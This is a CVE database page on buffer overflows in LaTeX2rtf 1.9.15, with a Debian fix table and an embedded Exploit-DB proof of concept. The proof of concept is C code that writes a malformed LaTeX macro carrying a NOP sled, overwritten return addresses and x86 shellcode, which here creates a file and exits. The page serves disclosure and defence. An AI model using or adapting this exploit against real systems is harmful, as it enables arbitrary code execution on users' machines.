CVE-2004-2167
Description
Multiple buffer overflows in LaTeX2rtf 1.9.15, and possibly other versions, allow remote attackers to execute arbitrary code via (1) the expandmacro function, and possibly (2) Environments and (3) TranslateCommand.
Predictions
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.
✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
LaTeX2rtf 1.9.15 - Remote Buffer Overflow
/*
source: https://www.securityfocus.com/bid/11233/info
It is reported that LaTeX2rtf is susceptible to a remote buffer overflow vulnerability when handling malformed files. This vulnerability may allow a remote attacker to execute arbitrary code on a vulnerable computer to gain unauthorized access. This issue is due to a failure of the application to perform proper bounds checks before copying data into a fixed sized memory buffer.
Version 1.9.15 of LaTeX2rtf is reported vulnerable to this issue. Other versions may also be affected.
*/
char center[] = {
0x59 /* cx = *sp++ */
, 0x31, 0xc0 /* ax ^= ax */
, 0x40 /* ++ax */
, 0x40 /* ++ax */
, 0x40 /* ++ax */
, 0xc1, 0xe0, 0x07 /* ax <<= 7 */
, 0x50 /* *--sp = ax 0600 */
, 0xb8, 0x12, 0x34, 0x56, 0x02 /* ax = 0x02563412 */
, 0xc1, 0xe8, 0x18 /* ax >>= 24 */
, 0xc1, 0xe0, 0x08 /* ax <<= 8 */
, 0x50 /* *--sp = ax 512:O_CREAT */
, 0x51 /* *--sp = cx "EXPLOITED" */
, 0x31, 0xc0 /* ax ^= ax */
, 0xb0, 0x05 /* ax = (ax & ~255) + 5 */
, 0x50 /* *--sp = ax 5:open */
, 0xcd, 0x80 /* syscall */
, 0x31, 0xc0 /* ax ^= ax */
, 0x50 /* *--sp = ax 0 */
, 0x40 /* ++ax */
, 0x50 /* *--sp = ax 1:exit */
, 0xcd, 0x80 /* syscall */
} ;
int main()
int i;
printf("\\def\\row#1{");
for (i = 0;i < 1024;++i)
putchar('x');
for (i = 0;i < 6;++i) {
/* preserve args[0] */
putchar(0x40); putchar(0x6d); putchar(0x08); putchar(0x08);
}
for (i = 0;i < 5;++i) {
/* smasher */
putchar(0x40); putchar(0xf9); putchar(0xbf); putchar(0xbf);
}
for (i = 0;i < 256;++i)
putchar(0x90);
putchar(0xeb); putchar(sizeof(center));
/* 0xeb 0x07 means ip += 7 */
/* assuming here that center has at most 255 bytes */
for (i = 0;i < sizeof center;++i)
putchar(center[i]);
putchar(0xe8);
putchar(251 - sizeof center); putchar(0xff); putchar(0xff); putchar(0xff);
/* 0xe8 0xf4 0xff 0xff 0xff means *--sp = ip; ip -= 12 */
printf("EXPLOITED");
printf("}\n");
printf("\\begin{document}\n");
printf("\\row a\n");
printf("\\end{document}\n");
}OS impact
Debian Fixed 5 releases
| Version | Status | Fixed in |
|---|---|---|
| trixie | Fixed | 1.9.16 |
| sid | Fixed | 1.9.16 |
| forky | Fixed | 1.9.16 |
| bullseye | Fixed | 1.9.16 |
| bookworm | Fixed | 1.9.16 |
References
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.